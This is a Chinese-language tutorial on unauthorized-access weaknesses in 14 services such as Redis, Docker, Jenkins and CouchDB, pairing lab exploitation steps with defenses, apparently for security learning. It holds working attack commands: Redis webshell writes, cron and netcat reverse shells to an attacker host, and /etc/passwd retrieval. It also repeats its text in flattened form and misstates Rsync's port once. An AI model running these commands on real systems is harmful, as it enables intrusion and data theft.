常见未授权访问漏洞总结
字数 2153 2025-09-29 20:06:32

常见未授权访问漏洞总结与防御指南

Redis 未授权访问漏洞

漏洞简介与危害

  • Redis默认绑定在0.0.0.0:6379
  • 无密码认证时,攻击者可未授权访问并读取数据
  • 攻击者可利用config命令进行写文件操作,包括:
    • 写入SSH公钥实现登录
    • 添加计划任务
    • 写入Webshell

漏洞利用方法

  1. 环境搭建

    wget http://download.redis.io/releases/redis-2.8.17.tar.gz
    tar xzvf redis-2.8.17.tar.gz
    cd redis-2.8.17
    make
    cd src/
    cp redis-server /usr/bin/
    cp redis-cli /usr/bin/
    cd ..
    cp redis.conf /etc/
    redis-server /etc/redis.conf
    
  2. 未授权访问测试

    • 使用Redis客户端直接连接无需认证
  3. 写入Webshell

    config set dir /var/www/html
    config set dbfilename test.php
    set webshell "<?php phpinfo(); ?>"
    save
    
  4. 计划任务反弹Shell

    nc -lvnp 5555  # 攻击机监听
    config set dir /var/spool/cron
    set -.- "\n\n\n*bash -i >& /dev/tcp/192.168.15.3/5555 0>&1\n\n\n"
    config set dbfilename root
    save
    

防御措施

  • 禁止使用root权限启动Redis
  • 启用密码认证
  • 添加IP访问限制
  • 更改默认6379端口

MongoDB 未授权访问漏洞

漏洞简介与危害

  • 默认无认证,攻击者可通过默认端口(27017)任意操作数据库
  • 可执行增删改查等高危操作

漏洞利用方法

  1. 环境搭建

    docker pull mongo
    docker run -d -p 27017:27017 --name mongodb mongo
    
  2. 未授权访问测试

    • 使用NoSQLBooster等工具直接连接

防御措施

  • 启动时添加--auth参数
  • 为MongoDB添加用户
  • 禁用HTTP服务(--nohttpinterface)
  • 绑定IP(bind_ip = 127.0.0.1)

Jenkins 未授权访问漏洞

漏洞简介与危害

  • 默认允许通过脚本执行界面操作系统命令
  • 攻击者可获取服务器权限

漏洞利用方法

  1. 环境搭建

    wget http://mirrors.jenkins.io/debian/jenkins_1.621_all.deb
    dpkg -i jenkins_1.621_all.deb
    service jenkins start
    
  2. 命令执行

    println "whoami".execute().text
    
  3. 写入Webshell

    new File("/var/www/html/shell.php").write('<?php phpinfo(); ?>')
    

防御措施

  • 升级最新版本
  • 添加强密码认证
  • 禁止公网直接暴露Jenkins

Memcached 未授权访问漏洞

漏洞简介与危害

  • 默认无权限控制模块
  • 攻击者可读取Memcached中的敏感信息

漏洞利用方法

  1. 环境搭建

    • Windows: 下载并安装memcached-win64-1.4.4-14.zip
    • 启动服务: memcached.exe -d start
  2. 未授权访问测试

    telnet 10.0.4.138 11211
    stats  # 查看服务状态
    

防御措施

  • 限制Memcached只允许本地访问
  • 禁止外网访问11211端口
  • 配置访问控制策略

JBoss 未授权访问漏洞

漏洞简介与危害

  • 默认情况下访问/jmx-console无需认证
  • 可部署恶意war包获取服务器权限

漏洞利用方法

  1. 环境搭建

    docker pull testjboss/jboss:latest
    docker run -p 8080:8080 -d 5661a2e31006
    
  2. 未授权访问测试

    • 访问http://ip:8080/jmx-console/
  3. 部署恶意war包

    • 通过jboss.deployment功能上传webshell

防御措施

  • 对jmx控制页面添加访问验证
  • 进行JMX Console安全配置

VNC 未授权访问漏洞

漏洞简介与危害

  • 默认端口5900、5901
  • 无认证时可直接控制目标主机

漏洞利用方法

  1. 环境搭建

    • 下载安装RealVNC
  2. 未授权访问测试

    vncviewer 192.168.15.8
    

防御措施

  • 配置VNC客户端登录口令认证
  • 设置强密码
  • 以普通权限运行

Docker 未授权访问漏洞

漏洞简介与危害

  • Docker Remote API(2375端口)未授权访问
  • 可新建/删除container,甚至获取宿主机shell

漏洞利用方法

  1. 环境搭建

    docker-compose build && docker-compose up -d
    
  2. 未授权访问测试

    docker -H tcp://192.168.15.5:2375 version
    
  3. 反弹宿主机Shell

    # 进入容器并修改crontab
    echo 'usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root
    

防御措施

  • 对2375端口做网络访问控制
  • 使用TLS认证

ZooKeeper 未授权访问漏洞

漏洞简介与危害

  • 默认端口2181无认证
  • 攻击者可收集敏感信息或破坏集群

漏洞利用方法

  1. 环境搭建

    wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz
    tar -xzvf zookeeper-3.4.14.tar.gz
    cd zookeeper-3.4.14/conf
    mv zoo_sample.cfg zoo.cfg
    ../bin/zkServer.sh start
    
  2. 未授权访问测试

    echo envi|nc 172.16.2.251 2181
    

防御措施

  • 修改默认端口
  • 添加访问控制
  • 配置认证

Rsync 未授权访问漏洞

漏洞简介与危害

  • 默认端口837允许匿名访问
  • 可读取/写入任意文件

漏洞利用方法

  1. 环境搭建

    docker-compose build && docker-compose up -d
    
  2. 未授权访问测试

    rsync rsync://172.16.2.250:873/
    
  3. 下载文件

    rsync rsync://172.16.2.250:873/src/etc/passwd ./
    

防御措施

  • 配置认证用户名及密码
  • 合理设置权限
  • 控制接入源IP

Atlassian Crowd 未授权访问漏洞

漏洞简介与危害

  • pdkinstall开发插件错误启用
  • 可安装恶意插件执行任意代码

漏洞利用方法

  1. 环境搭建

    wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip
    unzip atlassian-crowd-3.4.3.zip
    cd atlassian-crowd-3.4.3
    ./start_crowd.sh
    
  2. 上传恶意插件

    curl --form "file_cdl=@applinks-plugin-5.4.12.jar" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v
    

防御措施

  • 限制访问源IP
  • 升级到3.5.0以上版本

CouchDB 未授权访问漏洞

漏洞简介与危害

  • 默认5984端口Restful API无认证
  • 可执行任意命令

漏洞利用方法

  1. 环境搭建

    docker-compose up -d
    
  2. 命令执行

    curl -X PUT 'http://192.168.18.129:5984/_config/query_servers/cmd' -d '"curl http://192.168.18.138:9999/test.php"'
    

防御措施

  • 绑定指定IP
  • 设置访问密码

Elasticsearch 未授权访问漏洞

漏洞简介与危害

  • 默认9200/9300端口无认证
  • 可对数据进行任意操作

漏洞利用方法

  1. 环境搭建

    wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip
    unzip elasticsearch-5.5.0.zip
    cd elasticsearch-5.5.0/bin
    ./elasticsearch
    
  2. 未授权访问测试

    curl http://localhost:9200/_nodes
    

防御措施

  • 限制IP访问
  • 为9200端口设置认证

Hadoop 未授权访问漏洞

漏洞简介与危害

  • 50070 web端口未授权访问
  • 可删除/下载数据或执行命令

漏洞利用方法

  1. 环境搭建

    docker-compose build && docker-compose up -d
    
  2. 命令执行

    • 通过REST API提交恶意Application

防御措施

  • 关闭不必要的Web管理页面
  • 开启身份验证
  • 限制可信任IP访问

Jupyter Notebook 未授权访问漏洞

漏洞简介与危害

  • 未配置密码时未授权访问
  • 可执行任意Python代码和命令

漏洞利用方法

  1. 环境搭建

    docker-compose up -d
    
  2. 未授权访问测试

    • 访问http://192.168.18.129:8888
    • 通过Terminal执行命令

防御措施

  • 开启身份验证
  • 限制IP访问

总结

本文总结了14种常见服务的未授权访问漏洞,包括漏洞原理、利用方法和防御措施。管理员应定期检查这些服务的配置,确保已采取适当的安全措施,防止未授权访问导致的安全事件。

常见未授权访问漏洞总结与防御指南 Redis 未授权访问漏洞 漏洞简介与危害 Redis默认绑定在0.0.0.0:6379 无密码认证时,攻击者可未授权访问并读取数据 攻击者可利用config命令进行写文件操作,包括: 写入SSH公钥实现登录 添加计划任务 写入Webshell 漏洞利用方法 环境搭建 : 未授权访问测试 : 使用Redis客户端直接连接无需认证 写入Webshell : 计划任务反弹Shell : 防御措施 禁止使用root权限启动Redis 启用密码认证 添加IP访问限制 更改默认6379端口 MongoDB 未授权访问漏洞 漏洞简介与危害 默认无认证,攻击者可通过默认端口(27017)任意操作数据库 可执行增删改查等高危操作 漏洞利用方法 环境搭建 : 未授权访问测试 : 使用NoSQLBooster等工具直接连接 防御措施 启动时添加--auth参数 为MongoDB添加用户 禁用HTTP服务(--nohttpinterface) 绑定IP(bind_ ip = 127.0.0.1) Jenkins 未授权访问漏洞 漏洞简介与危害 默认允许通过脚本执行界面操作系统命令 攻击者可获取服务器权限 漏洞利用方法 环境搭建 : 命令执行 : 写入Webshell : 防御措施 升级最新版本 添加强密码认证 禁止公网直接暴露Jenkins Memcached 未授权访问漏洞 漏洞简介与危害 默认无权限控制模块 攻击者可读取Memcached中的敏感信息 漏洞利用方法 环境搭建 : Windows: 下载并安装memcached-win64-1.4.4-14.zip 启动服务: memcached.exe -d start 未授权访问测试 : 防御措施 限制Memcached只允许本地访问 禁止外网访问11211端口 配置访问控制策略 JBoss 未授权访问漏洞 漏洞简介与危害 默认情况下访问 /jmx-console 无需认证 可部署恶意war包获取服务器权限 漏洞利用方法 环境搭建 : 未授权访问测试 : 访问 http://ip:8080/jmx-console/ 部署恶意war包 : 通过jboss.deployment功能上传webshell 防御措施 对jmx控制页面添加访问验证 进行JMX Console安全配置 VNC 未授权访问漏洞 漏洞简介与危害 默认端口5900、5901 无认证时可直接控制目标主机 漏洞利用方法 环境搭建 : 下载安装RealVNC 未授权访问测试 : 防御措施 配置VNC客户端登录口令认证 设置强密码 以普通权限运行 Docker 未授权访问漏洞 漏洞简介与危害 Docker Remote API(2375端口)未授权访问 可新建/删除container,甚至获取宿主机shell 漏洞利用方法 环境搭建 : 未授权访问测试 : 反弹宿主机Shell : 防御措施 对2375端口做网络访问控制 使用TLS认证 ZooKeeper 未授权访问漏洞 漏洞简介与危害 默认端口2181无认证 攻击者可收集敏感信息或破坏集群 漏洞利用方法 环境搭建 : 未授权访问测试 : 防御措施 修改默认端口 添加访问控制 配置认证 Rsync 未授权访问漏洞 漏洞简介与危害 默认端口837允许匿名访问 可读取/写入任意文件 漏洞利用方法 环境搭建 : 未授权访问测试 : 下载文件 : 防御措施 配置认证用户名及密码 合理设置权限 控制接入源IP Atlassian Crowd 未授权访问漏洞 漏洞简介与危害 pdkinstall开发插件错误启用 可安装恶意插件执行任意代码 漏洞利用方法 环境搭建 : 上传恶意插件 : 防御措施 限制访问源IP 升级到3.5.0以上版本 CouchDB 未授权访问漏洞 漏洞简介与危害 默认5984端口Restful API无认证 可执行任意命令 漏洞利用方法 环境搭建 : 命令执行 : 防御措施 绑定指定IP 设置访问密码 Elasticsearch 未授权访问漏洞 漏洞简介与危害 默认9200/9300端口无认证 可对数据进行任意操作 漏洞利用方法 环境搭建 : 未授权访问测试 : 防御措施 限制IP访问 为9200端口设置认证 Hadoop 未授权访问漏洞 漏洞简介与危害 50070 web端口未授权访问 可删除/下载数据或执行命令 漏洞利用方法 环境搭建 : 命令执行 : 通过REST API提交恶意Application 防御措施 关闭不必要的Web管理页面 开启身份验证 限制可信任IP访问 Jupyter Notebook 未授权访问漏洞 漏洞简介与危害 未配置密码时未授权访问 可执行任意Python代码和命令 漏洞利用方法 环境搭建 : 未授权访问测试 : 访问 http://192.168.18.129:8888 通过Terminal执行命令 防御措施 开启身份验证 限制IP访问 总结 本文总结了14种常见服务的未授权访问漏洞,包括漏洞原理、利用方法和防御措施。管理员应定期检查这些服务的配置,确保已采取适当的安全措施,防止未授权访问导致的安全事件。